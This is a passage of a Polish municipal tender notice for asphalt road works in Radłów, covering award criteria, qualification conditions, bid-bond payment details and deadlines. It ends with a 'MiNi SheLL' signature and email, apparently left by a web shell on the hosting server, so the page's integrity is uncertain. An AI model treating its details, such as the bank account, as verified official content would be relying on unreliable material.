dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczące:<br/><br/>1)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli: wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 2.000.000,00 PLN.<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków ekonomicznych i finansowych udziału w postępowaniu Wykonawca składa na wezwanie Zamawiającego:<br/> - informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego należy przeliczyć:<br/> - dla posiadanych „środków finansowych/zdolności kredytowej” wg średniego kursu NBP na dzień wystawienia dokumentu.<br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek. <br/><br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie <br/>z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/><br/>2)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 robotę budowlaną polegającą na budowie, przebudowie lub remoncie drogi lub dróg o nawierzchni asfaltowej, której wartość wyniosła co najmniej 1.000.000,00 zł brutto (słownie: jeden milion złotych). <br/><br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 10 do SWZ.<br/><br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>W zakresie potwierdzenia braku podstaw do wykluczenia:<br/><br/>	oświadczenia Wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu złożonym na podstawie art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>	a) art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>	b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się <br/> o zamówienie publiczne tytułem środka zapobiegawczego, <br/>	c) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi<br/> Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>	d) art. 108 ust. 1 pkt 6 ustawy Pzp <br/><br/>którego wzór stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>a)	W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których roboty budowlane zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty, zgodnie z wymogiem określonym w Rozdziale II ust. 7 pkt. 2) SWZ.<br/>	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości określonej przez zamawiającego, w Rozdziale II ust. 7 pkt. 1) SWZ, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 30.000,00 zł (słownie: trzydzieści tysięcy złotych).<br/>2)	Wadium musi obejmować pełen okres związania ofertą, tj. do dnia 04.05.2022 r.. <br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku w Banku Spółdzielczym Rzemiosła Oddział Radłów Nr 10858900060240000000260004 z dopiskiem “wpłata wadium – sprawa nr PPI.271.10.22”. <br/>5)	Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>6)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Radłów z siedzibą ul. Kolejowa 7, 33-130 Radłów<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>7)	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku:•Wykonawcy występujący wspólnie są zobowiązani do ustanowienia<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.• Wszelka<br/>korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.Oświadczenie potwierdzające brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Odnośnie do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane, do realizacji których te zdolności są wymagane.W takim przypadku<br/>Wykonawcy składają oświadczenie, określone wart. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 10 do SWZ. Pozostałe wymagania określają dokumenty zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy:a)Zmiana<br/>materiałów budowlanych, sprzętu, urządzeń, sposobu wykonania gdy wykorzystanie materiałów<br/>budowlanych, sprzętu i urządzeń wskazanych w dokumentacji projektowej lub ofercie, sposobu<br/>wykonania stanie się niemożliwe lub podyktowane będzie usprawnieniem procesu<br/>budowy,postępem technologicznym, zwiększeniem bezpieczeństwa na budowie,b)Zmiana<br/>terminu realizacji przedmiotu zamówienia i wynagrodzenia Wykonawcy w przypadku:<br/> działania<br/>siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie terminie,<br/> zaistnienia<br/>niesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie robót lub<br/>spełnienie wymogów technologicznych udokumentowanych w dzienniku budowy,<br/> konieczności<br/>uzyskania decyzji i uzgodnień, mogąca spowodować wstrzymanie robót,<br/>konieczności wykonania<br/>dodatkowych badań i ekspertyz,<br/> przedłużającej się procedury administracyjnej z przyczyn niezależnych od Wykonawcy. zmiany<br/>sposobu przeprowadzenia robót, ograniczenia zakresu robót lub wprowadzeniem robót<br/>zamiennych.  konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z<br/>konieczności dostosowania zakresu zadania do powszechnie obowiązujących przepisów prawa<br/>braku możliwości prowadzenia robót na skutek warunków klimatycznych: (gwałtowne opady<br/>deszczu, gradobicie, śnieżyce, powodzie i inne anomalia klimatyczne) uniemożliwiające<br/>prowadzenie robót budowlanych, przeprowadzanie prób(sprawdzeń), dokonanie odbiorów,<br/>przez okres powyżej 4 dni,<br/> nieterminowego, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego<br/>terenu budowy Wykonawcy, wstrzymania prac budowlanych przez właściwy organ z przyczyn<br/>niezależnych od Wykonawcy,<br/>innych okolicznościami niepowstałych z winy Wykonawcy (m.in. koniecznością wykonania robót<br/>dodatkowych lub robót zamiennych; koniecznością wykonania robót przez innego Wykonawcę w<br/>miejscu wykonywania prac budowlanych), c) Zmiana wynagrodzenia za realizację zadnia<br/>objętego zamówieniem w przypadku zmiany stawki podatku VAT oraz na skutek zmiany cen materiałów budowlanych (klauzula waloryzacyjna). Szczegółowy opis sposobu dokonywania zmian zawarty został w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com